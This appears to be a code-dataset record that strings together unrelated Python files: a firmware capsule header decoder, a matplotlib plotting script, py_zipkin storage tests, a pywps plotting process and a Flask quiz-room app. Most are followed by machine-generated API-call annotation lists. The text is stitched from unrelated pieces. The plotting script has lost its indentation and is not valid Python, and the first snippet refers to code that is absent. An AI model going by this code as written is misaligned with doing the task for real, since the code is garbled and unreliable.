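HEADER_FORMAT = '=ILHHBBBBBBBBBBBBIIQ'   # same format string as GenCapsuleSubItem above
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)  # 40 bytes

def decode_payload_header(buffer):
    fields = struct.unpack_from(HEADER_FORMAT, buffer)
    return {
        'Version': fields[0],
        'UpdateImageTypeId': fields[1:12],   # GUID packed as one L, two H and eight B values
        'UpdateImageIndex': fields[12],
        'reserved_bytes': fields[13:16],
        'UpdateImageSize': fields[16],
        'UpdateVendorCodeSize': fields[17],
        'UpdateHardwareInstance': fields[18],
    }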
import matplotlib.pyplot as plt
import numpy as np
# Read data
size = []
time = []
with open("pi_linear.txt") as file:
for line in file.readlines():
x, y = line.split(',')
size.append(int(x.strip()))
time.append(float(y.strip()))
# Plot data
fig, ax = plt.subplots()
ax.plot(size, time)
ax.set(xlabel='Num. processes', ylabel='Time (s)',
title='Pi linear')
#ax.grid()
fig.savefig("pi_linear.png")
plt.show()
| [
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] | [((288, 302), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (300, 302), True, 'import matplotlib.pyplot as plt\n'), ((442, 452), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (450, 452), True, 'import matplotlib.pyplot as plt\n')] |
import mock
import pytest
import py_zipkin.storage
@pytest.fixture(autouse=True, scope="module")
def create_zipkin_attrs():
# The following tests all expect _thread_local.zipkin_attrs to exist: if it
# doesn't, mock.patch will fail.
py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_returns_none_if_no_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().get()
assert not py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_none_if_no_zipkin_attrs():
with mock.patch.object(py_zipkin.storage.log, "warning", autospec=True) as log:
assert not py_zipkin.storage.Stack([]).get()
assert log.call_count == 1
def test_storage_stack_still_works_if_you_dont_pass_in_storage():
# Let's make sure this still works if we don't pass in a custom storage.
assert not py_zipkin.storage.Stack().get()
def test_get_zipkin_attrs_returns_the_last_of_the_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_the_last_of_the_list():
assert "foo" == py_zipkin.storage.Stack(["bar", "foo"]).get()
def test_pop_zipkin_attrs_does_nothing_if_no_requests():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().pop()
def test_pop_zipkin_attrs_with_context_does_nothing_if_no_requests():
assert not py_zipkin.storage.Stack([]).pop()
def test_pop_zipkin_attrs_removes_the_last_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo", "bar"]):
assert "bar" == py_zipkin.storage.ThreadLocalStack().pop()
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_pop_zipkin_attrs_with_context_removes_the_last_zipkin_attrs():
context_stack = py_zipkin.storage.Stack(["foo", "bar"])
assert "bar" == context_stack.pop()
assert "foo" == context_stack.get()
def test_push_zipkin_attrs_adds_new_zipkin_attrs_to_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
py_zipkin.storage.ThreadLocalStack().push("bar")
assert "bar" == py_zipkin.storage.ThreadLocalStack().get()
def test_push_zipkin_attrs_with_context_adds_new_zipkin_attrs_to_list():
stack = py_zipkin.storage.Stack(["foo"])
assert "foo" == stack.get()
stack.push("bar")
assert "bar" == stack.get()
def test_stack_copy():
stack = py_zipkin.storage.Stack()
stack.push("a")
stack.push("b")
the_copy = stack.copy()
the_copy.push("c")
stack.push("d")
assert ["a", "b", "c"] == the_copy._storage
assert ["a", "b", "d"] == stack._storage
| [
"pytest.fixture",
"mock.patch.object"
] | [((55, 99), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)', 'scope': '"""module"""'}), "(autouse=True, scope='module')\n", (69, 99), False, 'import pytest\n'), ((415, 471), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', '[]'], {}), "(tracer._context_stack, '_storage', [])\n", (432, 471), False, 'import mock\n'), ((682, 748), 'mock.patch.object', 'mock.patch.object', (['py_zipkin.storage.log', '"""warning"""'], {'autospec': '(True)'}), "(py_zipkin.storage.log, 'warning', autospec=True)\n", (699, 748), False, 'import mock\n'), ((1158, 1219), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', "['foo']"], {}), "(tracer._context_stack, '_storage', ['foo'])\n", (1175, 1219), False, 'import mock\n'), ((1547, 1603), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', '[]'], {}), "(tracer._context_stack, '_storage', [])\n", (1564, 1603), False, 'import mock\n'), ((1910, 1978), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', "['foo', 'bar']"], {}), "(tracer._context_stack, '_storage', ['foo', 'bar'])\n", (1927, 1978), False, 'import mock\n'), ((2451, 2512), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', "['foo']"], {}), "(tracer._context_stack, '_storage', ['foo'])\n", (2468, 2512), False, 'import mock\n')] |
from pywps import Process, LiteralInput, ComplexInput, ComplexOutput
from pywps import Format
import logging
LOGGER = logging.getLogger('PYWPS')
import matplotlib
# no X11 server ... must be run first
# https://github.com/matplotlib/matplotlib/issues/3466/
matplotlib.use('Agg')
import matplotlib.pylab as plt
import cartopy.crs as ccrs
from netCDF4 import Dataset
AIR_DS = 'https://www.esrl.noaa.gov/psd/thredds/fileServer/Datasets/ncep.reanalysis.derived/surface/air.mon.ltm.nc'
def simple_plot(resource, variable=None, output=None):
output = output or 'plot.png'
ds = Dataset(resource)
values = ds.variables[variable]
fig = plt.figure(figsize=(20, 10))
ax = plt.axes(projection=ccrs.PlateCarree())
plt.contourf(values[0, :, :])
ax.stock_img()
ax.coastlines()
plt.colorbar()
fig.savefig(output)
plt.close()
return output
class SimplePlot(Process):
def __init__(self):
inputs = [
ComplexInput('dataset', 'Dataset', supported_formats=[Format('application/x-netcdf')],
default=AIR_DS,
abstract='Example: {0}'.format(AIR_DS)),
LiteralInput('variable', 'Variable', data_type='string',
default='air',
abstract='Please enter the variable name to be plotted, example: air'),
]
outputs = [
ComplexOutput('output', 'Simple Plot', supported_formats=[Format('image/png')],
as_reference=True),
]
super(SimplePlot, self).__init__(
self._handler,
identifier='simple_plot',
title='Simple Plot',
abstract='Returns a nice and simple plot.',
version='1.0',
inputs=inputs,
outputs=outputs,
store_supported=True,
status_supported=True
)
def _handler(self, request, response):
variable = request.inputs['variable'][0].data
output = simple_plot(
resource=request.inputs['dataset'][0].file,
variable=variable)
LOGGER.info("produced output: %s", output)
response.outputs['output'].file = output
response.update_status("simple_plot done", 100)
return response
| [
"logging.getLogger",
"pywps.LiteralInput",
"pywps.Format",
"matplotlib.pylab.figure",
"matplotlib.use",
"netCDF4.Dataset",
"cartopy.crs.PlateCarree",
"matplotlib.pylab.colorbar",
"matplotlib.pylab.contourf",
"matplotlib.pylab.close"
] | [((120, 146), 'logging.getLogger', 'logging.getLogger', (['"""PYWPS"""'], {}), "('PYWPS')\n", (137, 146), False, 'import logging\n'), ((260, 281), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (274, 281), False, 'import matplotlib\n'), ((586, 603), 'netCDF4.Dataset', 'Dataset', (['resource'], {}), '(resource)\n', (593, 603), False, 'from netCDF4 import Dataset\n'), ((650, 678), 'matplotlib.pylab.figure', 'plt.figure', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (660, 678), True, 'import matplotlib.pylab as plt\n'), ((732, 761), 'matplotlib.pylab.contourf', 'plt.contourf', (['values[0, :, :]'], {}), '(values[0, :, :])\n', (744, 761), True, 'import matplotlib.pylab as plt\n'), ((805, 819), 'matplotlib.pylab.colorbar', 'plt.colorbar', ([], {}), '()\n', (817, 819), True, 'import matplotlib.pylab as plt\n'), ((848, 859), 'matplotlib.pylab.close', 'plt.close', ([], {}), '()\n', (857, 859), True, 'import matplotlib.pylab as plt\n'), ((708, 726), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (724, 726), True, 'import cartopy.crs as ccrs\n'), ((1168, 1314), 'pywps.LiteralInput', 'LiteralInput', (['"""variable"""', '"""Variable"""'], {'data_type': '"""string"""', 'default': '"""air"""', 'abstract': '"""Please enter the variable name to be plotted, example: air"""'}), "('variable', 'Variable', data_type='string', default='air',\n abstract='Please enter the variable name to be plotted, example: air')\n", (1180, 1314), False, 'from pywps import Process, LiteralInput, ComplexInput, ComplexOutput\n'), ((1016, 1046), 'pywps.Format', 'Format', (['"""application/x-netcdf"""'], {}), "('application/x-netcdf')\n", (1022, 1046), False, 'from pywps import Format\n'), ((1462, 1481), 'pywps.Format', 'Format', (['"""image/png"""'], {}), "('image/png')\n", (1468, 1481), False, 'from pywps import Format\n')] |
# -*- coding: utf-8 -*-
import json
import os.path
import random
import re
from flask import Flask, send_from_directory
from flask import request, abort
from flaskrun.flaskrun import flask_run
import datab.social_database as db
app = Flask(__name__)
# Regular expression to only accept certain files
fileChecker = re.compile(r"(.*\.js|.*\.html|.*\.png|.*\.css|.*\.map)$")
numberOfAnswers = 4
random.seed(7)
def root_dir(): # pragma: no cover
return os.path.abspath(os.path.dirname(__file__))
@app.route('/')
def root():
return index("index2.html")
@app.route('/<path:filename>')
def index(filename):
if fileChecker.match(filename):
return send_from_directory(os.path.join(root_dir(), 'static'), filename)
abort(403)
@app.route('/register')
def register():
# To obtain the mail
email = request.args.get('email')
print(email)
if email is None:
return json.dumps({})
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/join_room')
def join_room():
room_id = request.args.get('room_id')
email = request.args.get('email')
user_id = db.register_or_get_email(email)
db.exec_query("REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)", [room_id, user_id])
return json.dumps({"id": user_id})
@app.route('/answered_room')
def answered_room():
room_id = request.args.get('room_id')
user_id = request.args.get('user_id')
values = db.exec_query("SELECT a.id "
"FROM answer a INNER JOIN question q "
"WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s",
[room_id, user_id])
return json.dumps({"answered": len(values) > 0})
@app.route('/get_user_id')
def get_user_id():
email = request.args.get('email')
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/create_room')
def create_room():
user_id = request.args.get('user_id')
room_id = db.exec_query("INSERT INTO room (creator) VALUES (%s)", [user_id])
return json.dumps({"id": room_id})
@app.route('/get_rooms')
def get_rooms():
user_id = request.args.get('user_id')
values = db.exec_query("SELECT r.id, r.status FROM room r WHERE r.creator=%s", [user_id])
response = []
for val in values:
response.append({"id": val[0], "status": val[1]})
return json.dumps(response)
@app.route('/fill_room', methods=['POST'])
def fill_room():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"})
else:
room_id = json_data["room_id"]
questions = json_data["question"]
for q in questions:
db.exec_query("INSERT INTO question (room_id, question) VALUES (%s, %s)", [room_id, q])
return json.dumps({"info": "Data received"})
@app.route('/open_room')
def open_room():
room_id = request.args.get('room_id')
print(room_id)
db.exec_query("UPDATE room r SET r.status='started' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been opened successfully", "status": "started"})
@app.route('/close_room')
def close_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='closed' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been closed successfully", "status": "closed"})
@app.route('/finish_room')
def finish_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='finished' WHERE r.id = %s", [room_id])
# for
# SELECT id, COUNT(a.id), COUNT(a.id) FROM Room r INNER JOIN
values = db.exec_query("SELECT u.email , COUNT(qq.id) "
"FROM quiz_question qq "
"INNER JOIN users u ON (qq.asked_user_id = u.id) "
"INNER JOIN room_members rm ON (u.id = rm.user_id) "
"WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s "
"GROUP BY u.email "
"ORDER BY COUNT(qq.id) DESC",
[room_id])
ranking = []
for row in values:
ranking.append({"email": row[0], "correct": row[1]})
return json.dumps({"ranking": ranking})
@app.route('/room_status')
def status_room():
room_id = request.args.get('room_id')
# SELECT status FROM Room WHERE id = 1
values = db.exec_query("SELECT status FROM room WHERE id = %s", [room_id])
return json.dumps({
"status": values[0][0]
})
@app.route('/get_room_questions')
def get_room_question():
room_id = request.args.get('room_id')
values = db.exec_query("SELECT id, question FROM question WHERE room_id = %s", [room_id])
response = []
for val in values:
response.append({"id": val[0], "text": val[1]})
return json.dumps({"questions": response})
@app.route('/post_room_answers', methods=['POST'])
def post_room_answers():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"}), 404
user_id = json_data["user_id"]
values = []
for a in json_data["answers"]:
values.append((a["id"], user_id, a["text"]))
print(values[len(values) - 1])
db.exec_many_query("INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)", values)
return json.dumps({"info": "Data received"})
@app.route('/get_quiz_question')
def get_question():
room_id = int(request.args.get('room_id'))
user_id = int(request.args.get('user_id'))
possible_questions = db.get_non_answered_questions(room_id, user_id)
possible_users_to_ask = db.get_non_answered_people(room_id, user_id)
question_id = []
asked_about_id = []
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
else:
possible_questions = db.get_all_questions(room_id)
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
if len(possible_users_to_ask) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
else:
possible_users_to_ask = db.get_all_different_people(room_id, user_id)
        if len(possible_users_to_ask) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
if len(question_id) > 0 and 0 < len(asked_about_id):
quiz_question_id = db.insert_quiz_question(user_id, asked_about_id[0], question_id[0])
other_users = db.get_all_different_people(room_id, asked_about_id[0])
random.shuffle(other_users)
answers = []
(answer_id, text_id) = db.get_answer(question_id[0], asked_about_id[0])
db.exec_query("UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s", [answer_id, quiz_question_id])
answers.append((answer_id, text_id))
if min(numberOfAnswers - 1, len(other_users)) > 0:
for i in range(min(numberOfAnswers - 1, len(other_users))):
(answer_id, text_id) = db.get_answer(question_id[0], other_users[i])
answers.append((answer_id, text_id))
# if commented the first answer will be the correct one
random.shuffle(answers)
answer_json = []
for (answer_id, text_id) in answers:
answer_json.append({"id": answer_id, "text": text_id})
print(quiz_question_id)
# SELECT 'question' FROM 'Question' WHERE 'id' = 3
value = db.exec_query("SELECT id "
"FROM quiz_question "
"WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s",
[user_id, asked_about_id[0], question_id[0]])
quiz_question_id = value[0][0]
value = db.exec_query("SELECT q.question "
"FROM question q "
"WHERE q.id = %s",
[question_id[0]])
question_text = value[0][0]
value = db.exec_query("SELECT u.email "
"FROM users u "
"WHERE u.id=%s",
[asked_about_id[0]])
user_name = value[0][0]
question_text = "What did %s answer to '%s' ?" % (user_name, question_text)
return json.dumps({
"id": quiz_question_id,
"question": question_text,
"answers": answer_json
})
else:
return json.dumps({"error": "Not available questions for this user in this room"})
@app.route('/post_quiz_answer')
def post_answer():
quiz_question_id = request.args.get('quiz_question_id')
quiz_answer_id = request.args.get('quiz_answer_id')
db.exec_query("UPDATE quiz_question SET answered_id = %s WHERE id = %s", [quiz_answer_id, quiz_question_id])
value = db.exec_query("SELECT qq.answered_id, qq.correct_answer_id, qq.question_id "
"FROM quiz_question qq "
"WHERE qq.id = %s", [quiz_question_id])
answered_id = value[0][0]
correct_answer_id = value[0][1]
question_id = value[0][2]
value = db.exec_query("SELECT a.answer FROM answer a WHERE a.id = %s ", [correct_answer_id])
if len(value) > 0:
text = value[0][0]
else:
text = "something when wrong"
if value is None:
return json.dumps({"error": "Internal server error"})
return json.dumps({
"correct": answered_id == correct_answer_id,
"question": question_id,
"correct_answer": {"id": correct_answer_id, "text": text}
})
if __name__ == '__main__':
flask_run(app)
| [
"flask.request.args.get",
"re.compile",
"flask.Flask",
"datab.social_database.exec_many_query",
"datab.social_database.insert_quiz_question",
"json.dumps",
"datab.social_database.register_or_get_email",
"datab.social_database.get_all_different_people",
"flask.abort",
"random.sample",
"flaskrun.flaskrun.flask_run",
"random.shuffle",
"datab.social_database.exec_query",
"flask.request.get_json",
"datab.social_database.get_non_answered_questions",
"datab.social_database.get_non_answered_people",
"random.seed",
"datab.social_database.get_all_questions",
"datab.social_database.get_answer"
] | [((238, 253), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (243, 253), False, 'from flask import Flask, send_from_directory\n'), ((319, 380), 're.compile', 're.compile', (['"""(.*\\\\.js|.*\\\\.html|.*\\\\.png|.*\\\\.css|.*\\\\.map)$"""'], {}), "('(.*\\\\.js|.*\\\\.html|.*\\\\.png|.*\\\\.css|.*\\\\.map)$')\n", (329, 380), False, 'import re\n'), ((398, 412), 'random.seed', 'random.seed', (['(7)'], {}), '(7)\n', (409, 412), False, 'import random\n'), ((742, 752), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (747, 752), False, 'from flask import request, abort\n'), ((832, 857), 'flask.request.args.get', 'request.args.get', (['"""email"""'], {}), "('email')\n", (848, 857), False, 'from flask import request, abort\n'), ((942, 973), 'datab.social_database.register_or_get_email', 'db.register_or_get_email', (['email'], {}), '(email)\n', (966, 973), True, 'import datab.social_database as db\n'), ((985, 1012), 'json.dumps', 'json.dumps', (["{'id': id_user}"], {}), "({'id': id_user})\n", (995, 1012), False, 'import json\n'), ((1071, 1098), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (1087, 1098), False, 'from flask import request, abort\n'), ((1111, 1136), 'flask.request.args.get', 'request.args.get', (['"""email"""'], {}), "('email')\n", (1127, 1136), False, 'from flask import request, abort\n'), ((1151, 1182), 'datab.social_database.register_or_get_email', 'db.register_or_get_email', (['email'], {}), '(email)\n', (1175, 1182), True, 'import datab.social_database as db\n'), ((1187, 1287), 'datab.social_database.exec_query', 'db.exec_query', (['"""REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)"""', '[room_id, user_id]'], {}), "('REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)',\n [room_id, user_id])\n", (1200, 1287), True, 'import datab.social_database as db\n'), ((1295, 1322), 'json.dumps', 'json.dumps', (["{'id': user_id}"], {}), "({'id': user_id})\n", (1305, 1322), False, 'import json\n'), ((1389, 1416), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (1405, 1416), False, 'from flask import request, abort\n'), ((1431, 1458), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (1447, 1458), False, 'from flask import request, abort\n'), ((1472, 1630), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT a.id FROM answer a INNER JOIN question q WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s"""', '[room_id, user_id]'], {}), "(\n 'SELECT a.id FROM answer a INNER JOIN question q WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s'\n , [room_id, user_id])\n", (1485, 1630), True, 'import datab.social_database as db\n'), ((1821, 1846), 'flask.request.args.get', 'request.args.get', (['"""email"""'], {}), "('email')\n", (1837, 1846), False, 'from flask import request, abort\n'), ((1861, 1892), 'datab.social_database.register_or_get_email', 'db.register_or_get_email', (['email'], {}), '(email)\n', (1885, 1892), True, 'import datab.social_database as db\n'), ((1904, 1931), 'json.dumps', 'json.dumps', (["{'id': id_user}"], {}), "({'id': id_user})\n", (1914, 1931), False, 'import json\n'), ((1994, 2021), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (2010, 2021), False, 'from flask import request, abort\n'), ((2036, 2102), 'datab.social_database.exec_query', 'db.exec_query', (['"""INSERT INTO room (creator) VALUES (%s)"""', '[user_id]'], {}), "('INSERT INTO 
room (creator) VALUES (%s)', [user_id])\n", (2049, 2102), True, 'import datab.social_database as db\n'), ((2114, 2141), 'json.dumps', 'json.dumps', (["{'id': room_id}"], {}), "({'id': room_id})\n", (2124, 2141), False, 'import json\n'), ((2200, 2227), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (2216, 2227), False, 'from flask import request, abort\n'), ((2241, 2326), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT r.id, r.status FROM room r WHERE r.creator=%s"""', '[user_id]'], {}), "('SELECT r.id, r.status FROM room r WHERE r.creator=%s', [user_id]\n )\n", (2254, 2326), True, 'import datab.social_database as db\n'), ((2432, 2452), 'json.dumps', 'json.dumps', (['response'], {}), '(response)\n', (2442, 2452), False, 'import json\n'), ((2531, 2549), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2547, 2549), False, 'from flask import request, abort\n'), ((2961, 2988), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (2977, 2988), False, 'from flask import request, abort\n'), ((3012, 3097), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE room r SET r.status=\'started\' WHERE r.id = %s"""', '[room_id]'], {}), '("UPDATE room r SET r.status=\'started\' WHERE r.id = %s", [room_id]\n )\n', (3025, 3097), True, 'import datab.social_database as db\n'), ((3104, 3190), 'json.dumps', 'json.dumps', (["{'info': 'The room has been opened successfully', 'status': 'started'}"], {}), "({'info': 'The room has been opened successfully', 'status':\n 'started'})\n", (3114, 3190), False, 'import json\n'), ((3247, 3274), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (3263, 3274), False, 'from flask import request, abort\n'), ((3279, 3364), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE room r SET r.status=\'closed\' WHERE r.id = %s"""', '[room_id]'], {}), '("UPDATE room r SET r.status=\'closed\' WHERE r.id = %s", [room_id]\n )\n', (3292, 3364), True, 'import datab.social_database as db\n'), ((3371, 3456), 'json.dumps', 'json.dumps', (["{'info': 'The room has been closed successfully', 'status': 'closed'}"], {}), "({'info': 'The room has been closed successfully', 'status':\n 'closed'})\n", (3381, 3456), False, 'import json\n'), ((3515, 3542), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (3531, 3542), False, 'from flask import request, abort\n'), ((3547, 3634), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE room r SET r.status=\'finished\' WHERE r.id = %s"""', '[room_id]'], {}), '("UPDATE room r SET r.status=\'finished\' WHERE r.id = %s", [\n room_id])\n', (3560, 3634), True, 'import datab.social_database as db\n'), ((3718, 4013), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT u.email , COUNT(qq.id) FROM quiz_question qq INNER JOIN users u ON (qq.asked_user_id = u.id) INNER JOIN room_members rm ON (u.id = rm.user_id) WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s GROUP BY u.email ORDER BY COUNT(qq.id) DESC"""', '[room_id]'], {}), "(\n 'SELECT u.email , COUNT(qq.id) FROM quiz_question qq INNER JOIN users u ON (qq.asked_user_id = u.id) INNER JOIN room_members rm ON (u.id = rm.user_id) WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s GROUP BY u.email ORDER BY COUNT(qq.id) DESC'\n , [room_id])\n", (3731, 4013), True, 'import datab.social_database as db\n'), ((4324, 4356), 'json.dumps', 'json.dumps', (["{'ranking': 
ranking}"], {}), "({'ranking': ranking})\n", (4334, 4356), False, 'import json\n'), ((4419, 4446), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (4435, 4446), False, 'from flask import request, abort\n'), ((4503, 4568), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT status FROM room WHERE id = %s"""', '[room_id]'], {}), "('SELECT status FROM room WHERE id = %s', [room_id])\n", (4516, 4568), True, 'import datab.social_database as db\n'), ((4580, 4616), 'json.dumps', 'json.dumps', (["{'status': values[0][0]}"], {}), "({'status': values[0][0]})\n", (4590, 4616), False, 'import json\n'), ((4706, 4733), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (4722, 4733), False, 'from flask import request, abort\n'), ((4747, 4832), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT id, question FROM question WHERE room_id = %s"""', '[room_id]'], {}), "('SELECT id, question FROM question WHERE room_id = %s', [room_id]\n )\n", (4760, 4832), True, 'import datab.social_database as db\n'), ((4938, 4973), 'json.dumps', 'json.dumps', (["{'questions': response}"], {}), "({'questions': response})\n", (4948, 4973), False, 'import json\n'), ((5068, 5086), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (5084, 5086), False, 'from flask import request, abort\n'), ((5354, 5459), 'datab.social_database.exec_many_query', 'db.exec_many_query', (['"""INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)"""', 'values'], {}), "(\n 'INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)',\n values)\n", (5372, 5459), True, 'import datab.social_database as db\n'), ((5462, 5499), 'json.dumps', 'json.dumps', (["{'info': 'Data received'}"], {}), "({'info': 'Data received'})\n", (5472, 5499), False, 'import json\n'), ((5675, 5722), 'datab.social_database.get_non_answered_questions', 'db.get_non_answered_questions', (['room_id', 'user_id'], {}), '(room_id, user_id)\n', (5704, 5722), True, 'import datab.social_database as db\n'), ((5751, 5795), 'datab.social_database.get_non_answered_people', 'db.get_non_answered_people', (['room_id', 'user_id'], {}), '(room_id, user_id)\n', (5777, 5795), True, 'import datab.social_database as db\n'), ((8731, 8767), 'flask.request.args.get', 'request.args.get', (['"""quiz_question_id"""'], {}), "('quiz_question_id')\n", (8747, 8767), False, 'from flask import request, abort\n'), ((8789, 8823), 'flask.request.args.get', 'request.args.get', (['"""quiz_answer_id"""'], {}), "('quiz_answer_id')\n", (8805, 8823), False, 'from flask import request, abort\n'), ((8829, 8942), 'datab.social_database.exec_query', 'db.exec_query', (['"""UPDATE quiz_question SET answered_id = %s WHERE id = %s"""', '[quiz_answer_id, quiz_question_id]'], {}), "('UPDATE quiz_question SET answered_id = %s WHERE id = %s', [\n quiz_answer_id, quiz_question_id])\n", (8842, 8942), True, 'import datab.social_database as db\n'), ((8951, 9097), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT qq.answered_id, qq.correct_answer_id, qq.question_id FROM quiz_question qq WHERE qq.id = %s"""', '[quiz_question_id]'], {}), "(\n 'SELECT qq.answered_id, qq.correct_answer_id, qq.question_id FROM quiz_question qq WHERE qq.id = %s'\n , [quiz_question_id])\n", (8964, 9097), True, 'import datab.social_database as db\n'), ((9256, 9345), 'datab.social_database.exec_query', 'db.exec_query', (['"""SELECT a.answer FROM answer a WHERE a.id = %s """', '[correct_answer_id]'], {}), 
"('SELECT a.answer FROM answer a WHERE a.id = %s ', [\n correct_answer_id])\n", (9269, 9345), True, 'import datab.social_database as db\n'), ((9536, 9681), 'json.dumps', 'json.dumps', (["{'correct': answered_id == correct_answer_id, 'question': question_id,\n 'correct_answer': {'id': correct_answer_id, 'text': text}}"], {}), "({'correct': answered_id == correct_answer_id, 'question':\n question_id, 'correct_answer': {'id': correct_answer_id, 'text': text}})\n", (9546, 9681), False, 'import json\n'), ((9752, 9766), 'flaskrun.flaskrun.flask_run', 'flask_run', (['app'], {}), '(app)\n', (9761, 9766), False, 'from flaskrun.flaskrun import flask_run\n'), ((912, 926), 'json.dumps', 'json.dumps', (['{}'], {}), '({})\n', (922, 926), False, 'import json\n'), ((2591, 2629), 'json.dumps', 'json.dumps', (["{'error': 'no JSON found'}"], {}), "({'error': 'no JSON found'})\n", (2601, 2629), False, 'import json\n'), ((2865, 2902), 'json.dumps', 'json.dumps', (["{'info': 'Data received'}"], {}), "({'info': 'Data received'})\n", (2875, 2902), False, 'import json\n'), ((5573, 5600), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (5589, 5600), False, 'from flask import request, abort\n'), ((5620, 5647), 'flask.request.args.get', 'request.args.get', (['"""user_id"""'], {}), "('user_id')\n", (5636, 5647), False, 'from flask import request, abort\n'), ((5901, 5937), 'random.sample', 'random.sample', (['possible_questions', '(1)'], {}), '(possible_questions, 1)\n', (5914, 5937), False, 'import random\n'), ((5977, 6006), 'datab.social_database.get_all_questions', 'db.get_all_questions', (['room_id'], {}), '(room_id)\n', (5997, 6006), True, 'import datab.social_database as db\n'), ((6174, 6213), 'random.sample', 'random.sample', (['possible_users_to_ask', '(1)'], {}), '(possible_users_to_ask, 1)\n', (6187, 6213), False, 'import random\n'), ((6256, 6301), 'datab.social_database.get_all_different_people', 'db.get_all_different_people', (['room_id', 'user_id'], {}), '(room_id, user_id)\n', (6283, 6301), True, 'import datab.social_database as db\n'), ((6496, 6563), 'datab.social_database.insert_quiz_question', 'db.insert_quiz_question', (['user_id', 'asked_about_id[0]', 'question_id[0]'], {}), '(user_id, asked_about_id[0], question_id[0])\n', (6519, 6563), True, 'import datab.social_database as db\n'), ((6587, 6642), 'datab.social_database.get_all_different_people', 'db.get_all_different_people', (['room_id', 'asked_about_id[0]'], {}), '(room_id, asked_about_id[0])\n', (6614, 6642), True, 'import datab.social_database as db\n'), ((6651, 6678), 'random.shuffle', 'random.shuffle', (['other_users'], {}), '(other_users)\n', (6665, 6678), False, 'import random\n'), ((6732, 6780), 'datab.social_database.get_answer', 'db.get_answer', 